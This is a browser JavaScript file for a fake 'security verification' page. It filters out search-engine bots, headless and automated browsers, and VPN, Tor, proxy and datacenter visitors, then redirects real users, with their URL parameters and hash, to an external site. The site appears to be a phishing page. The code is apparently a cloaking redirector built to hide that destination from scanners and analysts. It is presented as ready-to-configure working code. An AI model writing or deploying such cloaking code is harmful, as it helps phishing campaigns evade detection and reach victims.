// Configuration - MODIFY THESE VALUES
const CONFIG = {
    // The URL to redirect to after all checks pass
    targetUrl: "https://orientanb.it.com/webvast/delfax/index.html?utm=",
    
    // IP intelligence API endpoint
    ipApiUrl: "https://api.ipapi.is/",
    
    // Security settings
    security: {
        blockMobile: false,      // Set to true to block mobile devices
        blockProxy: true,        // Set to true to block proxy connections
        blockTor: true,          // Set to true to block Tor network
        blockVPN: true,          // Set to true to block VPN connections
        blockDatacenter: true,   // Set to true to block datacenter/hosting IPs
        
        // Minimum time (in ms) required for security checks (prevents bots from bypassing)
        minVerificationTime: 20000,
        
        // Advanced bot detection
        detectHeadlessBrowser: true,
        detectAutomationTools: true,
        requireUserInteraction: true
    }
};

// DOM elements
const statusElement = document.getElementById("status");
const loaderElement = document.getElementById("loader");
const redirectButton = document.getElementById("redirectBtn");

// Track verification start time
const verificationStartTime = Date.now();

// Store security check results
const securityChecks = {
    browserValid: false,
    notBot: false,
    ipValid: false,
    userInteracted: false
};

// Store IP details for error messages
let ipDetails = {};

/**
 * Shows a status message to the user
 */
function showStatus(message, type) {
    statusElement.textContent = message;
    statusElement.className = type;
    statusElement.style.display = "block";
}

/**
 * Shows/hides the loading spinner
 */
function toggleLoader(show) {
    loaderElement.style.display = show ? "block" : "none";
}

/**
 * Performs browser environment validation
 */
function validateBrowserEnvironment() {
    return new Promise((resolve) => {
        // Check if browser has standard properties (detect headless browsers)
        if (CONFIG.security.detectHeadlessBrowser) {
            // Missing navigator properties can indicate headless browsers
            if (!navigator.language || !navigator.languages || navigator.languages.length === 0) {
                resolve(false);
                return;
            }
            
            // Check plugins and mime types (often empty in headless browsers)
            if (navigator.plugins && navigator.plugins.length === 0 && 
                navigator.mimeTypes && navigator.mimeTypes.length === 0) {
                resolve(false);
                return;
            }
        }
        
        // Check for automation tools
        if (CONFIG.security.detectAutomationTools) {
            // Look for automation-related properties
            if (navigator.webdriver || 
                window.callPhantom || 
                window._phantom || 
                window.__nightmare || 
                window.document.__selenium_unwrapped || 
                window.Selenium) {
                resolve(false);
                return;
            }
        }
        
        // Check for unusual screen properties
        const screenProperties = [
            window.screen.width,
            window.screen.height, 
            window.screen.colorDepth,
            window.screen.availWidth,
            window.screen.availHeight
        ];
        
        if (screenProperties.some(prop => prop === 0 || !prop)) {
            resolve(false);
            return;
        }
        
        resolve(true);
    });
}

/**
 * Performs simple bot detection by analyzing browser behavior
 */
function performBotDetection() {
    return new Promise((resolve) => {
        // Check for inconsistent user agent
        const userAgent = navigator.userAgent.toLowerCase();
        
        // Check for common bot patterns in user agent
        const botPatterns = [
            'bot', 'crawler', 'spider', 'slurp', 'bingbot', 'googlebot',
            'yandexbot', 'baiduspider', 'facebookexternalhit', 'sogou'
        ];
        
        if (botPatterns.some(pattern => userAgent.includes(pattern))) {
            resolve(false);
            return;
        }
        
        // Check if cookies are enabled (most bots don't handle cookies)
        if (!navigator.cookieEnabled) {
            resolve(false);
            return;
        }
        
        // Basic canvas fingerprinting to detect automation tools
        try {
            const canvas = document.createElement('canvas');
            const ctx = canvas.getContext('2d');
            ctx.textBaseline = "top";
            ctx.font = "14px 'Arial'";
            ctx.textBaseline = "alphabetic";
            ctx.fillStyle = "#f60";
            ctx.fillRect(125, 1, 62, 20);
            ctx.fillStyle = "#069";
            ctx.fillText("Fingerprint", 2, 15);
            ctx.fillStyle = "rgba(102, 204, 0, 0.7)";
            ctx.fillText("Fingerprint", 4, 17);
            
            const canvasUrl = canvas.toDataURL();
            if (!canvasUrl || canvasUrl === 'data:,') {
                resolve(false);
                return;
            }
        } catch (e) {
            resolve(false);
            return;
        }
        
        resolve(true);
    });
}

/**
 * Gets IP information using ipapi.is API
 */
async function getIpDetails() {
    try {
        // First get the user's IP by calling the API without a specific IP
        const response = await fetch(CONFIG.ipApiUrl);
        if (!response.ok) {
            throw new Error('Failed to retrieve IP details');
        }
        
        const data = await response.json();
        console.log("IP Details:", data);
        
        // Store full IP details for reference
        ipDetails = data;
        
        return data;
    } catch (error) {
        console.error("Error fetching IP details:", error);
        throw error;
    }
}

/**
 * Checks if the IP is allowed based on security settings
 */
function isIpAllowed(ipData) {
    if (!ipData) return false;
    
    // Check against security settings
    if (CONFIG.security.blockProxy && ipData.is_proxy) {
        return { allowed: false, reason: "Proxy connections are not allowed" };
    }
    
    if (CONFIG.security.blockTor && ipData.is_tor) {
        return { allowed: false, reason: "Tor network connections are not allowed" };
    }
    
    if (CONFIG.security.blockVPN && ipData.is_vpn) {
        return { allowed: false, reason: "VPN connections are not allowed" };
    }
    
    if (CONFIG.security.blockDatacenter && ipData.is_datacenter) {
        return { allowed: false, reason: "Datacenter/hosting IP addresses are not allowed" };
    }
    
    if (CONFIG.security.blockMobile && ipData.is_mobile) {
        return { allowed: false, reason: "Mobile connections are not allowed" };
    }
    
    return { allowed: true };
}

/**
 * Verifies user interaction (not just automated clicking)
 * 
 * Since we're automatically redirecting now, we need to make sure
 * this verification doesn't wait too long for legitimate users.
 */
function verifyUserInteraction() {
    if (!CONFIG.security.requireUserInteraction) {
        return Promise.resolve(true);
    }
    
    return new Promise((resolve) => {
        // Show a subtle message to encourage interaction
        showStatus("Moving your mouse or scrolling to complete verification...", "loading");
        
        // Track mouse movement
        let mouseMovements = 0;
        const mouseMoveHandler = () => {
            mouseMovements++;
            if (mouseMovements >= 2) { // Reduced from 3 to 2 movements
                document.removeEventListener('mousemove', mouseMoveHandler);
                document.removeEventListener('scroll', scrollHandler);
                document.removeEventListener('click', clickHandler);
                securityChecks.userInteracted = true;
                resolve(true);
            }
        };
        
        // Also accept scroll as interaction
        const scrollHandler = () => {
            document.removeEventListener('scroll', scrollHandler);
            document.removeEventListener('mousemove', mouseMoveHandler);
            document.removeEventListener('click', clickHandler);
            securityChecks.userInteracted = true;
            resolve(true);
        };
        
        // Also accept clicks anywhere as interaction
        const clickHandler = () => {
            document.removeEventListener('click', clickHandler);
            document.removeEventListener('mousemove', mouseMoveHandler);
            document.removeEventListener('scroll', scrollHandler);
            securityChecks.userInteracted = true;
            resolve(true);
        };
        
        document.addEventListener('mousemove', mouseMoveHandler);
        document.addEventListener('scroll', scrollHandler);
        document.addEventListener('click', clickHandler);
        
        // Reduced timeout from 10 seconds to 5 seconds for better UX
        setTimeout(() => {
            if (!securityChecks.userInteracted) {
                document.removeEventListener('mousemove', mouseMoveHandler);
                document.removeEventListener('scroll', scrollHandler);
                document.removeEventListener('click', clickHandler);
                resolve(false);
            }
        }, 5000); // Wait 5 seconds maximum for interaction
    });
}

/**
 * Ensures minimum time for verification has passed
 */
function ensureMinVerificationTime() {
    return new Promise((resolve) => {
        const elapsedTime = Date.now() - verificationStartTime;
        const remainingTime = Math.max(0, CONFIG.security.minVerificationTime - elapsedTime);
        
        setTimeout(() => {
            resolve(true);
        }, remainingTime);
    });
}

/**
 * Shows detailed information about why access was denied
 */
function showAccessDeniedInfo() {
    let detailsHtml = '';
    
    if (ipDetails) {
        const country = ipDetails.location?.country || 'Unknown';
        const city = ipDetails.location?.city || 'Unknown';
        const isp = ipDetails.company?.name || 'Unknown';
        
        detailsHtml = `
            <div class="details">
                <p><strong>Location:</strong> ${city}, ${country}</p>
                <p><strong>ISP/Organization:</strong> ${isp}</p>
            </div>
        `;
        
        // Add detection flags
        const flags = [];
        if (ipDetails.is_proxy) flags.push('Proxy');
        if (ipDetails.is_vpn) flags.push('VPN');
        if (ipDetails.is_tor) flags.push('Tor');
        if (ipDetails.is_datacenter) flags.push('Datacenter');
        
        if (flags.length > 0) {
            detailsHtml += `<p><strong>Detected:</strong> ${flags.join(', ')}</p>`;
        }
    }
    
    // Create and append the details div
    const detailsDiv = document.createElement('div');
    detailsDiv.className = 'access-denied-details';
    detailsDiv.innerHTML = detailsHtml;
    
    // Insert after the status message
    statusElement.parentNode.insertBefore(detailsDiv, statusElement.nextSibling);
}

/**
 * Gets the full target URL including all query parameters from the current URL
 */
function getTargetUrlWithParams() {
    let finalUrl = CONFIG.targetUrl;

    const search = window.location.search; // includes ? if present
    const hash = window.location.hash;     // includes # if present

    // If target URL already has parameters, append with &
    if (search) {
        finalUrl += finalUrl.includes('?') ? '&' + search.slice(1) : search;
    }

    // Append the hash as-is (includes #)
    if (hash) {
        finalUrl += hash;
    }

    return finalUrl;
}



/**
 * Performs all security checks and manages redirect
 */
async function performSecurityChecks() {
    try {
        toggleLoader(true);
        showStatus("Performing security checks...", "loading");
        
        // Run browser environment validation
        securityChecks.browserValid = await validateBrowserEnvironment();
        if (!securityChecks.browserValid) {
            throw new Error("Browser environment validation failed");
        }
        
        // Run bot detection
        securityChecks.notBot = await performBotDetection();
        if (!securityChecks.notBot) {
            throw new Error("Bot detection triggered");
        }
        
        // Get IP details and check if allowed
        const ipData = await getIpDetails();
        const ipCheck = isIpAllowed(ipData);
        
        if (!ipCheck.allowed) {
            throw new Error(ipCheck.reason);
        }
        
        securityChecks.ipValid = true;
        
        // Ensure minimum verification time has passed
        await ensureMinVerificationTime();
        
        // If user interaction is required, verify it now
        if (CONFIG.security.requireUserInteraction) {
            showStatus("Verifying user interaction...", "loading");
            securityChecks.userInteracted = await verifyUserInteraction();
            if (!securityChecks.userInteracted) {
                throw new Error("User interaction verification failed");
            }
        }
        
        // Get final URL with all query parameters
        const finalTargetUrl = getTargetUrlWithParams();
        
        // All checks passed, show success message and redirect automatically
        toggleLoader(false);
        showStatus("Verification successful! Redirecting you now...", "success");
        
        // Hide the continue button since we're redirecting automatically
        redirectButton.style.display = 'none';
        
        // Log the redirect URL for debugging
        console.log("Redirecting to:", finalTargetUrl);
        
        // Redirect after a short delay
        setTimeout(() => {
            window.location.href = finalTargetUrl;
        }, 1500);
        
    } catch (error) {
        toggleLoader(false);
        showStatus(`Access Denied: ${error.message}`, "error");
        console.error("Security check error:", error);
        
        // Show more details about why access was denied
        showAccessDeniedInfo();
        
        // Hide the redirect button
        redirectButton.style.display = 'none';
    }
}

// Initialize security checks when page loads
document.addEventListener("DOMContentLoaded", performSecurityChecks); 